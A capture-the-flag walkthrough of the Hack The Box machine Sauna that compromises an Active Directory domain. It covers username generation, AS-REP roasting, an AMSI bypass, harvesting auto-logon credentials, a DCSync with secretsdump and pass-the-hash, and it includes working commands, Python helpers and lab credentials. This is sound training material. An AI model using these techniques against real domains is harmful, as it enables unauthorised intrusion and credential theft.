Hack The Box Sauna

Intro

Sauna is a Windows machine from Hack The Box that covers a number of tools, including Impacket, WinPEAS, BloodHound, and Evil-WinRM. We start by harvesting employee names from the company website and turning them into candidate usernames, then use AS-REP Roasting to pull a crackable authentication reply for one of those users and recover the password offline. With that user's shell we find saved auto-logon credentials for a second account. That account holds replication rights over the domain, so a DCSync attack dumps every domain hash, including the Administrator's, which we then use in a pass-the-hash login.

Nmap

We can enumerate ports and services with nmap using the command sudo nmap -v -sV -sC -oN nmap 10.10.10.175 -p-

We are given 20 open ports which is common for a Windows Server running a Domain Controller:

Ports 389 and 3268 (LDAP and the Global Catalog) show the domain name EGOTISTICAL-BANK.LOCAL; keep that in mind, since every Kerberos and Impacket command later needs it. For now, let's take a look at the web page.

Web Page

Going to http://10.10.10.175 shows a web page for Egotistical Bank:

While doing some manual enumeration, we come across some employee names on the About Us section of the website:

Exposing employee names publicly is a real risk: once the naming convention is known, they become a ready-made list of candidate domain usernames. I created a text file of the employee names:

Now we can use username-anarchy to generate some usernames and hopefully we can find one that we can use:

And we can see our output:
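As an added example (not part of the original write-up, and not username-anarchy's own code), here is a small Python script that does the core of what username-anarchy does: it turns "First Last" names into the username formats most commonly seen in Windows domains. The names in SAMPLE_NAMES are constructed for the demo, not the list from the site.

```python
import re

# Constructed sample names for the demo (not the site's actual employee list).
SAMPLE_NAMES = ["Fergus Smith", "Jane Doe", "Mary-Anne O'Neil"]


def candidate_usernames(full_name):
    """Common Active Directory username formats for one 'First Last' name."""
    # Lower-case and keep ASCII letters and spaces only, so "O'Neil" -> "oneil".
    parts = re.sub(r"[^a-z ]", "", full_name.lower()).split()
    if not parts:
        return []
    if len(parts) == 1:
        return parts
    first, last = parts[0], parts[-1]  # middle names are ignored
    forms = [
        first + last,           # fergussmith
        first[0] + last,        # fsmith  (the convention Sauna turned out to use)
        first + "." + last,     # fergus.smith
        first + "_" + last,     # fergus_smith
        first[0] + "." + last,  # f.smith
        first + last[0],        # ferguss
        last + first[0],        # smithf
        last + "." + first,     # smith.fergus
        first,                  # fergus
        last,                   # smith
    ]
    out = []
    for form in forms:          # de-duplicate (e.g. first == last) but keep order
        if form not in out:
            out.append(form)
    return out


def build_wordlist(names):
    """Flatten all candidates into one ordered, de-duplicated list."""
    seen, wordlist = set(), []
    for name in names:
        for user in candidate_usernames(name):
            if user not in seen:
                seen.add(user)
                wordlist.append(user)
    return wordlist


if __name__ == "__main__":
    # Writes the same kind of file the write-up feeds to GetNPUsers.
    with open("usernames.txt", "w") as fh:
        fh.write("\n".join(build_wordlist(SAMPLE_NAMES)) + "\n")
```

The order matters more than it looks: GetNPUsers is run once per line, so the formats that most organisations actually use (first initial plus surname, first.last) sit near the top of each name's candidates.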

AS-REP Roasting

There is this great post on attacking Kerberos that includes AS-REP Roasting. Normally a Kerberos client has to pre-authenticate before the Domain Controller will issue a TGT: it sends a timestamp encrypted with the user's key, so the KDC can reject requests from anyone who does not know the password. If an account has the DONT_REQ_PREAUTH flag set ("Do not require Kerberos preauthentication" in the account properties), the KDC skips that check and returns an AS-REP to anyone who asks for that username. Part of that reply is encrypted with a key derived from the user's password, so it can be taken offline and cracked without ever authenticating.

We can use Impacket's GetNPUsers to look for any users that have this option enabled with the command while read p; do GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.10.10.175; done < usernames.txt (GetNPUsers can also take the list directly with -usersfile usernames.txt and save hits with -outputfile, which avoids the loop). The per-user errors are useful on their own: a user that exists but has pre-authentication enabled gets "doesn't have UF_DONT_REQUIRE_PREAUTH set", while a name that does not exist returns KDC_ERR_C_PRINCIPAL_UNKNOWN, so the same loop tells us which generated usernames are real accounts.

And we get a hit for user fsmith

I saved the hash line to a file called hash.txt and we can crack it using John the Ripper with the command john hash.txt --wordlist=<path to rockyou.txt> (keep the whole line, including the $krb5asrep$23$ prefix, since John identifies the krb5asrep format from it; hashcat takes the same line with -m 18200).
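The extract-and-save step above can be scripted. The following Python helper is an added example, not code from the write-up or from Impacket: it reads saved GetNPUsers output, pulls out the $krb5asrep$ lines unchanged so they can go straight into hash.txt, and separately records which usernames the KDC confirmed as valid but pre-auth protected. SAMPLE_OUTPUT is constructed in GetNPUsers' output format; the hex values are placeholders, not a real AS-REP from the box.

```python
import re

# Constructed in the format GetNPUsers.py prints; the hex is placeholder data.
# hsmith exists but requires pre-auth, fsmith is roastable, the third lookup
# was for a name that does not exist in the domain.
SAMPLE_OUTPUT = """\
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a1b2c3d4e5f60718293a4b5c6d7e8f90$00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
"""

# $krb5asrep$<etype>$<user>@<REALM>:<16-byte checksum>$<encrypted part>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)
PREAUTH_RE = re.compile(r"^\[-\] User (\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set$")


def parse_asrep_hashes(output):
    """One record per roastable account. 'line' is kept verbatim because John and
    hashcat recognise the format from the $krb5asrep$<etype>$ prefix."""
    found = []
    for raw in output.splitlines():
        line = raw.strip()
        m = ASREP_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["etype"] = int(rec["etype"])
            rec["line"] = line
            found.append(rec)
    return found


def triage_getnpusers(output):
    """Split the output into roastable accounts and accounts the KDC confirmed
    exist but protect with pre-auth: free valid-username enumeration."""
    roastable = [r["user"] for r in parse_asrep_hashes(output)]
    protected = []
    for raw in output.splitlines():
        m = PREAUTH_RE.match(raw.strip())
        if m:
            protected.append(m.group(1))
    return {"roastable": roastable, "valid_with_preauth": protected}


def cracker_flags(etype):
    """etype 23 (RC4-HMAC) is what Sauna returns; John and hashcat take it as-is."""
    if etype == 23:
        return {"john": "--format=krb5asrep", "hashcat": "-m 18200"}
    raise ValueError(f"etype {etype}: AES AS-REPs need a different cracker mode")


def write_hash_file(output, path="hash.txt"):
    """Write every roastable line to the file John will be pointed at."""
    recs = parse_asrep_hashes(output)
    with open(path, "w") as fh:
        fh.writelines(r["line"] + "\n" for r in recs)
    return [r["user"] for r in recs]


if __name__ == "__main__":
    print(triage_getnpusers(SAMPLE_OUTPUT))
```

Run GetNPUsers with its output redirected to a file, then call write_hash_file on that text; the valid_with_preauth list is worth keeping too, because those confirmed accounts are the ones to try a password spray against later.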

And we are given the password Thestrokes23.

We can confirm our findings using crackmapexec with the command crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23

We confirm our access to SMB but let’s see if we have remote access with crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23

And we do, so now we can use Evil-WinRM to establish a shell connection with evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

And we have access as FSmith. The user flag is in FSmith's Desktop directory:

Lateral Movement

I love Evil-WinRM’s ability to upload files and avoid any possible antivirus restrictions. We are going to use WinPeas to enumerate the system and see if we can find anything useful. First let’s go into Fsmith’s temp folder:

Going to the temp folder is not required, but it is good practice.

Then we can run Bypass-4MSI, which patches AMSI in the current PowerShell session so that what we load next is not scanned by it, and upload our WinPEAS binary with upload <local path to WinPEAS exe file>

Your file path may vary.

Then we can run it with ./WinPEASx64.exe

Looking through the output, we find two interesting things, first is the username of svc_loanmgr:

And the second thing, the password:

WinPEAS reports the DefaultUserName as svc_loanmanager, but the Users directory shows that the account which actually exists on the box is svc_loanmgr, so that is the name to try the stored password against:

We also could have found the password directly by querying the Winlogon key in the registry: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | findstr "DefaultUserName DefaultDomainName DefaultPassword" (in the Evil-WinRM PowerShell session, silence errors with 2>$null; 2>nul is the cmd.exe spelling, and 2>null would just create a file named null). Auto-logon stores the password in plaintext in a key that ordinary local users can read, which is why it is such a common foothold.

We can see if we have a remote connection for user svc_loanmgr with crackmapexec winrm 10.10.10.175 -u svc_loanmgr -p ‘Moneymakestheworldgoround!’

And we can use Evil-WinRM again with evil-winrm -i 10.10.10.175 -u svc_loanmgr -p ‘Moneymakestheworldgoround!’

Privilege Escalation

I tried running WinPEAS again as svc_loanmgr but was unable to find anything useful. However, since we are dealing with Active Directory, a great tool to use is Bloodhound.

Installing it is pretty straightforward, I actually found this pretty good instructions page here.

Once you have bloodhound all set up, let’s find the data we need by running SharpHound on the target system. You can find the Sharphound binary from here. From the SharpCollection directory, we can use this command to locate our file: find . | grep -i sharphound

Copy that to the directory you want to upload it from, then repeat the upload-and-run steps from before:

Once it's done running, you should have a zip file saved in the working directory:

Using the download command, we can download the zip file to our current directory:

Bloodhound

Now that we have our SharpHound zip file, let's fire up BloodHound. First start the neo4j database with sudo neo4j console

Then on a separate terminal window, just type bloodhound

A login page should automatically open asking for your credentials:

Once logged in, we can upload the zip file by just clicking-and-dragging it onto the page:

Once it's done, we can search for the user we want to start with, which in this case is svc_loanmgr:

Right-click on the user node and Mark As Owned

Then head over to Analysis:

We can explore the DCSync attack. More information on that can be found here

We see that our node has GetChanges and GetChangesAll rights to the domain:

According to the article, both GetChanges and GetChangesAll (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights) are required to execute this attack:

Right-click on either the GetChanges or GetChangesAll line between the nodes and you can click on Help for more information:

The Info section also confirms our findings:

And the Abuse Info goes into how we can exploit this:

DCSync Attack

For a DCSync attack, we can use Impacket's secretsdump with the command secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175 (adding -just-dc limits the output to the NTDS secrets pulled through replication). Under the hood, secretsdump uses svc_loanmgr's replication rights to call the directory replication service and ask the DC for each account's secrets exactly as a second DC would, so nothing has to be written to or executed on the DC.

And we are given a number of hashes, most importantly the Administrator's NT hash. We can perform a pass-the-hash attack with Impacket's wmiexec.py using the command wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175 The -hashes argument takes LMHASH:NTHASH; the LM half is left empty because only the NT hash is needed for NTLM authentication.

And we are in:

The root flag is in the Administrator's Desktop directory:

Conclusion

All in all, this was a fun box to learn a lot from. Understanding the different tools you can use, such as Impacket or BloodHound, will help you become a better pentester. This box was challenging in that the exploit paths were not always obvious. I found the AS-REP Roasting attack, seeded with nothing more than employee names from the public website, to be very realistic. Hope you enjoyed the write-up!

Feel free to leave a comment if you have any questions or suggestions!
